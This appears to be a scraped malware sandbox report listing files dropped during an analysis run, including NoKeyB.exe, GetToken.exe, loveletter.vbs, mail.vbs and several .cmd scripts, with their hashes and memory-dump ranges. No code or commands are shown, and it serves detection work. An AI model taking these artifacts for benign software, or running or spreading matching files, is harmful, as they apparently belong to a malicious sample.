d72def65bdf7535d47d6b2362e5e281c3b6f1292f29eee29b57bbe99e03689cc1f29645662bed4d66769565d7ec15e9ff5e595153329ec7892a83e57d31d2313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9f919c5d9db2c1e8ddb8e8a5daa185c3

SHA1
b8f8235942a14e955d393ad874dcdeb7cb741eca

SHA256
d999a5b1d898967acd4ff79003bbef8b1eeff815e572ddc6e8f1e8315bbdd93c

SHA512
d72def65bdf7535d47d6b2362e5e281c3b6f1292f29eee29b57bbe99e03689cc1f29645662bed4d66769565d7ec15e9ff5e595153329ec7892a83e57d31d2313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9f919c5d9db2c1e8ddb8e8a5daa185c3

SHA1
b8f8235942a14e955d393ad874dcdeb7cb741eca

SHA256
d999a5b1d898967acd4ff79003bbef8b1eeff815e572ddc6e8f1e8315bbdd93c

SHA512
d72def65bdf7535d47d6b2362e5e281c3b6f1292f29eee29b57bbe99e03689cc1f29645662bed4d66769565d7ec15e9ff5e595153329ec7892a83e57d31d2313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1affa511bfe9ee18c52dd333a6edbbd1

SHA1
b9aff7ea713eb42c7eb94b1606acfd79ef684fe7

SHA256
55886278efb18703ed63f28ae5011aa6051da3d0a59713ed3e2df30036c72c5f

SHA512
ad38d449c74b6c018e5709dd5af6f58a50e5914bc6ae73e0c5fc79724d47e58a1659692b5fe27e59b3e235f151f12199f1a175c6cffcd4b6d727049f88325bf7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1affa511bfe9ee18c52dd333a6edbbd1

SHA1
b9aff7ea713eb42c7eb94b1606acfd79ef684fe7

SHA256
55886278efb18703ed63f28ae5011aa6051da3d0a59713ed3e2df30036c72c5f

SHA512
ad38d449c74b6c018e5709dd5af6f58a50e5914bc6ae73e0c5fc79724d47e58a1659692b5fe27e59b3e235f151f12199f1a175c6cffcd4b6d727049f88325bf7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9f919c5d9db2c1e8ddb8e8a5daa185c3

SHA1
b8f8235942a14e955d393ad874dcdeb7cb741eca

SHA256
d999a5b1d898967acd4ff79003bbef8b1eeff815e572ddc6e8f1e8315bbdd93c

SHA512
d72def65bdf7535d47d6b2362e5e281c3b6f1292f29eee29b57bbe99e03689cc1f29645662bed4d66769565d7ec15e9ff5e595153329ec7892a83e57d31d2313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9f919c5d9db2c1e8ddb8e8a5daa185c3

SHA1
b8f8235942a14e955d393ad874dcdeb7cb741eca

SHA256
d999a5b1d898967acd4ff79003bbef8b1eeff815e572ddc6e8f1e8315bbdd93c

SHA512
d72def65bdf7535d47d6b2362e5e281c3b6f1292f29eee29b57bbe99e03689cc1f29645662bed4d66769565d7ec15e9ff5e595153329ec7892a83e57d31d2313

Download Submit
C:\Users\Admin\Documents\NoKeyB.exe

Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
C:\Users\Admin\Documents\NoKeyB.exe

Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
C:\Users\Admin\Documents\black.bat

Filesize
71B

MD5
3544e4b7ac1418d34061648a9f3e3dc6

SHA1
30e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce

SHA256
db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8

SHA512
5d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126

Download Submit
C:\Users\Admin\Downloads\2b2crypt.cmd

Filesize
133B

MD5
88c499eaa6d56b81dd768537c1ecb0d1

SHA1
4c46e09600275b2f12606988f4b094bc4eeb963c

SHA256
0350882ce7c5932dac22fb5bca6b68d003f9fbdccbef34705dfc46677dc852a1

SHA512
9de0d8199fd0e515f1f2bd39b82724d517dd60c69fb82e274fdb664d6997c93ce60b68efb4d0c4b947ef72da2748bf971b4a67172aa2ac613f15750e279d76f0

Download Submit
C:\Users\Admin\Downloads\2b2crypt.m.cmd

Filesize
139B

MD5
8176e163bf0ad76fd736cf7b30bcb70b

SHA1
61729d18f62b6dcb6072899d9920d25b79bfeaa1

SHA256
737c657b3c9930c93d06eef6f36241b4ab775c3aa577652c3718701bf745c05b

SHA512
b9ab5b3a45cc8a5a6b7d7686839769eeff2b052f0d061e2234e23d48e8d30f8e4bcb0ea27032a1c75fdff90f516bd7a25a09a76502daa2bfe2abb87f2ea46ff6

Download Submit
C:\Users\Admin\FuckPorts.cmd

Filesize
357B

MD5
d7cce0d652d1e1dbfffc2434835913a8

SHA1
009beed096a17fec661ba21e404a19a33bf3fdbd

SHA256
86590354b1862fbd67e6b51acafa972a1c6c3888780d98d537fbbe08814762dd

SHA512
862b5764efbdb24952303c124a071dcabf3b6786d97efd999a6c5fcc552d4fbb41e6d39ea9563adfbd785cba1a3c50f87484dbba67485c2bb793880555cfc9c1

Download Submit
C:\Users\Admin\GetToken.exe

Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\GetToken.exe

Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\loveletter.vbs

Filesize
495B

MD5
900ead69492d80e48738921eca28b14f

SHA1
6b51607c54f8e734a7ea47091859c3e8dce6365c

SHA256
c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3

SHA512
8fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2

Download Submit
C:\Users\Admin\mail.vbs

Filesize
488B

MD5
88ef4bc3f48eeb97aedadff8f3840980

SHA1
48e8167bef2562d902885a075f6190d269fd3d35

SHA256
b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa

SHA512
523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024

Download Submit
\Users\Admin\Documents\NoKeyB.exe

Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
memory/428-216-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp

Filesize
11.4MB

Download
memory/428-217-0x0000000002424000-0x0000000002427000-memory.dmp

Filesize
12KB

Download
memory/428-277-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/428-288-0x000000000242B000-0x000000000244A000-memory.dmp

Filesize
124KB

Download
memory/428-203-0x000007FEF33D0000-0x000007FEF3DF3000-memory.dmp

Filesize
10.1MB

Download
memory/968-200-0x000007FEF33D0000-0x000007FEF3DF3000-memory.dmp

Filesize
10.1MB

Download
memory/968-266-0x000000001B800000-0x000000001BAFF000-memory.dmp

Filesize
3.0MB

Download
memory/968-209-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp

Filesize
11.4MB

Download
memory/968-215-0x0000000002074000-0x0000000002077000-memory.dmp

Filesize
12KB

Download
memory/968-272-0x000000000207B000-0x000000000209A000-memory.dmp

Filesize
124KB

Download
memory/1036-54-0x000007FEFB721000-0x000007FEFB723000-memory.dmp

Filesize
8KB

Download
memory/1264-367-0x0000000000E30000-0x0000000000E38000-memory.dmp

Filesize
32KB

Download
memory/1384-345-0x00000000025E4000-0x00000000025E7000-memory.dmp

Filesize
12KB

Download
memory/1384-355-0x00000000025EB000-0x000000000260A000-memory.dmp

Filesize
124KB

Download
memory/1488-206-0x000007FEF33D0000-0x000007FEF3DF3000-memory.dmp

Filesize
10.1MB

Download
memory/1488-283-0x000000000246B000-0x000000000248A000-memory.dmp

Filesize
124KB

Download
memory/1488-276-0x000000001B930000-0x000000001BC2F000-memory.dmp

Filesize
3.0MB

Download
memory/1488-220-0x0000000002464000-0x0000000002467000-memory.dmp

Filesize
12KB

Download
memory/1488-214-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp

Filesize
11.4MB

Download
memory/1620-219-0x0000000002364000-0x0000000002367000-memory.dmp

Filesize
12KB

Download
memory/1620-271-0x000000000236B000-0x000000000238A000-memory.dmp

Filesize
124KB

Download
memory/1620-260-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/1620-201-0x000007FEF33D0000-0x000007FEF3DF3000-memory.dmp

Filesize
10.1MB

Download
memory/1620-212-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp

Filesize
11.4MB

Download
memory/1640-101-0x000007FEF3210000-0x000007FEF3D6D000-memory.dmp

Filesize
11.4MB

Download
memory/1640-102-0x0000000002584000-0x0000000002587000-memory.dmp

Filesize
12KB

Download
memory/1640-103-0x000000001B780000-0x000000001BA7F000-memory.dmp

Filesize
3.0MB

Download
memory/1640-100-0x000007FEF3D70000-0x000007FEF4793000-memory.dmp

Filesize
10.1MB

Download
memory/1640-104-0x000000000258B000-0x00000000025AA000-memory.dmp

Filesize
124KB

Download
memory/1752-91-0x000000000249B000-0x00000000024BA000-memory.dmp

Filesize
124KB

Download
memory/1752-89-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp

Filesize
11.4MB

Download
memory/1752-90-0x0000000002494000-0x0000000002497000-memory.dmp

Filesize
12KB

Download
memory/1752-88-0x000007FEF33D0000-0x000007FEF3DF3000-memory.dmp

Filesize
10.1MB

Download
memory/2208-280-0x0000000002794000-0x0000000002797000-memory.dmp

Filesize
12KB

Download
memory/2208-273-0x000007FEF33D0000-0x000007FEF3DF3000-memory.dmp

Filesize
10.1MB

Download
memory/2208-278-0x000000001B920000-0x000000001BC1F000-memory.dmp

Filesize
3.0MB

Download
memory/2208-285-0x000000000279B000-0x00000000027BA000-memory.dmp

Filesize
124KB

Download
memory/2208-275-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp

Filesize
11.4MB

Download
memory/2724-331-0x00000000732CD000-0x00000000732D8000-memory.dmp

Filesize
44KB

Download